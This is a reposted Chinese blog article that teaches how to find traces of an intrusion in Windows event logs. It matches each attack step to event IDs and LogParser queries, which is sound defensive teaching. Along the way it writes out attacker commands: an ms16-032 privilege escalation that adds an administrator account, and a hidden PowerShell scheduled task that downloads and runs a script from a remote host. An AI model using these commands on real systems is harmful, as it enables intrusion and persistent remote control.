[安全]在Windows日志里发现入侵痕迹(转载)

最新推荐文章于 2024-05-08 13:33:10 发布
最新推荐文章于 2024-05-08 13:33:10 发布
阅读量4.7k 收藏 21
点赞数 6
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/V1040375575/article/details/111152665
版权

转载文章来源:Bypass

有小伙伴问:Windows系统日志分析大多都只是对恶意登录事件进行分析的案例,可以通过系统日志找到其他入侵痕迹吗?

答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里,而执行操作系统命令的行为也会存在在系统日志。

不同的攻击场景会留下不一样的系统日志痕迹,不同的Event ID代表了不同的意义,需要重点关注一些事件ID,来分析攻击者在系统中留下的攻击痕迹。

我们通过一个攻击案例来进行windows日志分析,从日志里识别出攻击场景,发现恶意程序执行痕迹,甚至还原攻击者的行为轨迹。
1、信息收集

攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。
whoami
systeminfo

Windows日志分析:

在本地安全策略中,需开启审核进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件和说明,如:
4688 创建新进程
4689 进程终止
在这里插入图片描述

我们通过LogParser做一个简单的筛选,得到Event ID 4688,也就是创建新进程的列表,可以发现用户Bypass,先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序(cmd.exe)提供图形子系统等功能支持。

LogParser.exe -i:EVT “SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,’|’) as UserName,EXTRACT_TOKEN(Strings,5,’|’) as ProcessName FROM c:\11.evtx where EventID=4688”

在这里插入图片描述

2、权限提升

通过执行exp来提升权限,获取操作系统system权限,增加管理用户。
ms16-032.exe “whoami”
ms16-032.exe “net user test1 abc123! /add”
ms16-032.exe “net localgroup Administrators test1 /add”
Windows日志分析:

在本地安全策略中,需开启审核账户管理,关键账户管理事件和说明。如:
4720 创建用户
4732 已将成员添加到启用安全性的本地组

在这里插入图片描述

这里会涉及进程创建,主要关注账户创建和管理用户组变更。从Event ID 4720 ,系统新建了一个test用户,从Event ID 4732的两条记录变化,得到一个关键信息,本地用户test从user组提升到Administrators。

3、管理账号登录

在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。
mstsc /v 10.1.1.188
Windows日志分析:

在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:
4624 登录成功
4625 登录失败

在这里插入图片描述

LogParser.exe -i:EVT “SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,’|’) as EventType,EXTRACT_TOKEN(Strings,5,’|’) as username,EXTRACT_TOKEN(Strings,18,’|’) as Loginip FROM C:\3333.evtx where EventID=4624”

使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。

在这里插入图片描述

4、权限维持

通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:
schtasks /create /sc minute /mo 1 /tn “Security Script” /tr “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(””“http://10.1.1.1:8888/logo.txt”""))""
Windows日志分析:

在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:
4698 创建计划任务
4699 删除计划任务

在这里插入图片描述

这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:

在这里插入图片描述

转载学习!!!非原创!!!

pandarking
关注
  • 6
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全--Windows入侵排查
songbai220
12-12 880
Windows入侵排查 Windows入侵排查思路 1、检查系统账号安全 1、查看服务器是否有弱口令,远程管理端口是否对公网开放 检查方法:根据实际情况咨询相关服务器管理员,或者授权爆破 2、查看服务器是狗存在可疑、新增账号 检查方法:cmd输入lusrmgr.msc,查看是否有新增、可以账号,如有管理员群组的(administrators)的新增账户,立即禁用或者删除 3、查看服务器是否存在隐藏账号、克隆账号 检查方法:1、打开注册表,查看管理员对应键值 2、使用D盾Web查杀攻击
Windows操作系统安全入侵排查
09-30
1、Windows操作系统的安全配置,通过设置这些配置项可以在一定程度上保证系统的安全性,有效降低被攻击的风险,为业务稳定运行提供一定的保障。安全配置加固涉及的方面包括:补丁管理、账号口令、授权管理、服务管理...
windows入侵安全排查分析1
08-08
2、查看服务器是否存在可疑账号、新增账号 3、查看服务器是否存在隐藏账号、克隆账号 4、结合日志,查看管理员登录时间、用户名是否存在异常 2、webshell查
Windows日志分析
weixin_56233402的博客
04-22 3502
Windows系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹Windows主要有以下三类日志记录系统事件:应用程序日志、系统日志安全日志。系统日志记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。
Windows系统安全登录日志分析工具logonTracer汉化修正版_windows下载logontracer(1)
最新发布
2401_84254057的博客
05-08 519
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
入侵-抓肉机
weixin_33832340的博客
11-12 1105
一、学入侵,抓肉机---环境搭建篇 内容: 【1】入侵! 我们究竟需要怎样的环境?(可选择的环境-&gt;最大程度上利于入侵的环境) <a>可选择的操作系统:Windows NT/2000(Pro&Server&Advanced Server)/XP(Pro&Home)/2003/vista ...
使用安全洋葱分析 Windows 事件日志
allway2的博客
02-19 1252
是一个开源平台,汇集了用于威胁搜寻、安全监控和日志管理的各种工具。通过向导安装底层 Linux 和应用程序本身非常简单。
阅读笔记-通过网络日志来检测攻击
梦想闹钟
06-02 312
最近在研究通过网络日志来检测网络攻击,在这记录下读过的相关文章, 文章来源主要是ACM Digital Library Highly Predictive Blacklisting 1.文章主要介绍了一种设置网络黑名单的方法 2. 首先需要对日志进行一些过滤,如先筛去无效ip产生的日志,对常见的网站爬虫设置白名单, 同时排除了源端口为53 (DNS), 25 (SMTP), 80 (HTTP), 443 (VPN), 目的端口为 TCP 53 (DNS) 25 (SMTP)的网络日志条目,因为防火墙
快速掌握典型入侵日志分析
weixin_33727510的博客
11-16 1370
如今各式各样的Windows漏洞层出不穷,五花八门的入侵工具更是令人眼花缭乱,稍微懂点网络知识的人都可以利用各种入侵工具进行入侵,这可给我们的网管带来了很大的麻烦,虽然经过精心配置的服务器可以抵御大部分入侵,但随着不断新出的漏洞,再高明的网管也不敢保证一台务器长时间不会被侵入,所以,安全配置服务器并不能永远阻止黑客入侵,而如何检测入侵者行动以保证服务器安...
服务器入侵日志分析(一)——mysql日志位置确定
redwand的博客
12-23 2012
安全应急响应工作中,一项重要任务就是要对mysql数据库的日志进行分析。工作中,我们通过对mysql日志记录的审计,发现攻击行为,进而追溯攻击源。
转载】linux入侵日志分析
weixin_30347335的博客
06-18 817
日志也是用户应该注意的地方之一。不要低估日志文件对网络安全的重要作用,因为日志文件能够详细记录系统每天发生的各种各样的事件。用户可以通过日志文件 检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是:审核和监测。配置好的Linux的日志非常强大。对于 Linux系统而言,所有的日志文件都在/var/log下。默认情况下,Linux的日志文件已经足够...
攻防演练蓝队|Windows应急响应入侵排查
Y525698136的博客
02-16 1017
攻防演练蓝队|Windows应急响应入侵排查
Windows日志识别入侵痕迹.pdf
09-09
在网络安全领域,Windows日志是识别入侵痕迹的重要工具。攻击者在进行网络攻击时,往往会留下各种痕迹,这些痕迹可以通过分析系统日志来追踪。针对Windows日志分析,我们可以从以下几个方面深入理解: 1. **信息...
Windows日志外发配置
05-18
Windows操作系统中,日志管理是一项重要的系统监控和故障排查工作。日志外发,即把Windows系统的事件日志发送到远程服务器或者第三方日志分析工具,有助于集中管理和分析来自多台计算机的日志数据,提高运维效率。...
windows日志安全 网络安全
12-17
Windows 日志安全 Windows 日志安全是一项非常重要的安全措施,旨在保护 Windows 操作系统的安全。通过本实验,了解 Windows 日志的重要性,学习基本的 Windows 日志设置,管理删除 Windows 日志Windows 日志...
【深圳大学网络安全】实验六 入侵检测实验
归忆_AC的博客
01-30 1221
Snort 通过对获取的数据包,进行各规则的分析后,根据规则链,可采取Activation(报警并启动另外一个动态规则链)、Dynamic(由其它的规则包调用)、Alert(报警),Pass(忽略),Log(不报警但记录网络流量)五种响应的机制。例如,预处理插件的功能就是在规则匹配误用检测之前运行,完成TIP碎片重组,http解码,telnet解码等功能,处理插件完成检查协议各字段,关闭连接,攻击响应等功能,输出插件将得理后的各种情况以日志或警告的方式输出。IP长度为20,IP载荷是84字节。
windows入侵排查
qq_55894976的博客
04-01 312
a、开始--运行--输入msinfo32,依次点击“软件环境→正在运行任务”就可以查看到进程的详细信息,比如进程路径、进程ID、文件创建日期、启动时间等。b、单击开始菜单 >【运行】,输入 msconfig,查看是否存在命名异常的启动项目,是,则取消勾选命名异常的启动项目,并到命令中显示的路径删除文件。a、登录服务器,单击【开始】>【所有程序】>【启动】,默认情况下此目录在是一个空目录,确认是否有非。a、单击【开始】>【设置】>【控制面板】>【任务计划】,查看计划任务属性,便可以发现木马文件的路。
快速自检电脑是否被黑客入侵过(Windows版)
热门推荐
3569
12-25 1万+
https://www.pppan.net/blog/detail/2017-11-08-windows-self-check 1. 异常的日志记录 通常我们需要检查一些可疑的事件记录, 比如: “Event log service was stopped.”(事件记录服务已经停止) “Windows File Protection is not active on this
python查询windows安全日志
03-24
可以使用 PyWin32 库编写 Python 脚本来查询 Windows 安全日志。这个库提供了一个名为 win32evtlog 模块,可以让你访问 Windows Event Log 并在其中查询想要的信息。以下是简单的使用示例: ```python import win32evtlog def print_event(event): print("Event Category:", event.EventCategory) print("Time Generated:", event.TimeGenerated) print("Source Name:", event.SourceName) print("Event ID:", event.EventID) print("Event Type:", event.EventType) print("User:", event.StringInserts[-1]) print("Computer Name:", event.ComputerName) print("Description:", event.StringInserts[-2]) server = 'localhost' # or remote machine name logtype = 'Security' hand = win32evtlog.OpenEventLog(server, logtype) flags = win32evtlog.EVENTLOG_BACKWARDS_READ|win32evtlog.EVENTLOG_SEQUENTIAL_READ events = win32evtlog.ReadEventLog(hand, flags, 0) numevents = 0 for event in events: numevents += 1 print("Event #:", numevents) print_event(event) print("\n") win32evtlog.CloseEventLog(hand) ``` 此脚本将打印出 Windows 安全日志中的信息,你可以更改 print_event 函数来提取你所需的具体信息。关于 win32evtlog 模块的更多信息,可以参考官方文档:https://github.com/mhammond/pywin32
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值